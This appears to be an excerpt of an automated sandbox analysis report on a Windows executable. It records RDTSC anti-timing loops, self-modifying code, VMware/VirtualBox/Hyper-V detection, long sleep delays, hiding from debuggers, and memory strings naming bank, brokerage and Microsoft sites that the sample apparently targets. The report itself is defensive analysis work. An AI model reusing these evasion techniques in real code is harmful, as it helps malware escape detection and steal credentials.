                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC06C9 second address: 4AC06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8BCD0701Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC06F5 second address: 4AC0755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FC8BCFEEF0Ah 0x0000000c sbb ax, 0BB8h 0x00000011 jmp 00007FC8BCFEEF0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007FC8BCFEEF16h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC8BCFEEF0Dh 0x00000029 pop eax 0x0000002a jmp 00007FC8BCFEEF11h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0755 second address: 4AC077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FC8BCD07028h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC077E second address: 4AC0782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0782 second address: 4AC0786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0786 second address: 4AC078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC078C second address: 4AC07A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8BCD0701Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0018 second address: 4AC003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8BCFEEF0Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC003D second address: 4AC00B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC8BCD07027h 0x00000015 adc ax, 78FEh 0x0000001a jmp 00007FC8BCD07029h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FC8BCD07020h 0x00000026 add eax, 5E6347F8h 0x0000002c jmp 00007FC8BCD0701Bh 0x00000031 popfd 0x00000032 popad 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00B6 second address: 4AC00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00BA second address: 4AC00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00C0 second address: 4AC00D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00D3 second address: 4AC0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC8BCD07029h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC8BCD07021h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC8BCD0701Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0DBC second address: 4AC0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0DC0 second address: 4AC0DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0E6C second address: 4AC0EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 jmp 00007FC8BCFEEF10h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 pushad 0x00000012 mov esi, 222F7383h 0x00000017 pushfd 0x00000018 jmp 00007FC8BCFEEF18h 0x0000001d or ch, 00000048h 0x00000020 jmp 00007FC8BCFEEF0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 je 00007FC92DF729D3h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0EC4 second address: 4AC0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0EC8 second address: 4AC0ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ECC second address: 4AC0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ED2 second address: 4AC0ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ED8 second address: 4AC0EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCD07023h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0AED second address: 4AD0B51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2BBF3181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC8BCFEEF0Ch 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov cl, F7h 0x00000017 mov si, di 0x0000001a popad 0x0000001b push ebp 0x0000001c jmp 00007FC8BCFEEF12h 0x00000021 mov dword ptr [esp], esi 0x00000024 jmp 00007FC8BCFEEF10h 0x00000029 mov esi, dword ptr [ebp+0Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FC8BCFEEF17h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0B51 second address: 4AD0B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD07024h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0B69 second address: 4AD0BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC8BCFEEF17h 0x0000000f je 00007FC92DF6C733h 0x00000015 jmp 00007FC8BCFEEF16h 0x0000001a cmp dword ptr [75AB459Ch], 05h 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC8BCFEEF0Eh 0x00000028 sbb esi, 08746078h 0x0000002e jmp 00007FC8BCFEEF0Bh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0BD3 second address: 4AD0C01 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC8BCD07024h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007FC92DC9C8C0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC8BCD0701Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C01 second address: 4AD0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FC8BCFEEF0Dh 0x0000000b jmp 00007FC8BCFEEF0Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, esi 0x00000015 jmp 00007FC8BCFEEF16h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C41 second address: 4AD0C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C45 second address: 4AD0C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C61 second address: 4AD0C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0CB8 second address: 4AD0CEC instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC8BCFEEF11h 0x00000012 and cl, 00000056h 0x00000015 jmp 00007FC8BCFEEF11h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0CEC second address: 4AD0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD07023h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D03 second address: 4AD0D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC8BCFEEF0Ah 0x00000014 pushfd 0x00000015 jmp 00007FC8BCFEEF12h 0x0000001a and eax, 2E125838h 0x00000020 jmp 00007FC8BCFEEF0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D56 second address: 4AD0D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D5C second address: 4AD0D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D60 second address: 4AD0D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC8BCD0701Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D75 second address: 4AD0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D87 second address: 4AD0D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DA5 second address: 4AD0DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DB7 second address: 4AD0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007FC8BCD07026h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCD0701Ah 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DEE second address: 4AD0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DF4 second address: 4AD0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DFA second address: 4AD0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 837DB8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 9DFA2A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 83502A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: A0AB97 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 9E9C68 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 837D0E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: A75718 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7700Thread sleep time: -36018s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7696Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7680Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7788Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7692Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7676Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeLast function: Thread delayed
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506364695.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: LP4a6BowQN.exe, 00000000.00000002.1984768326.00000000009C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: LP4a6BowQN.exe, 00000000.00000002.1989902954.0000000000B67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000002.1984768326.00000000009C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: regmonclass
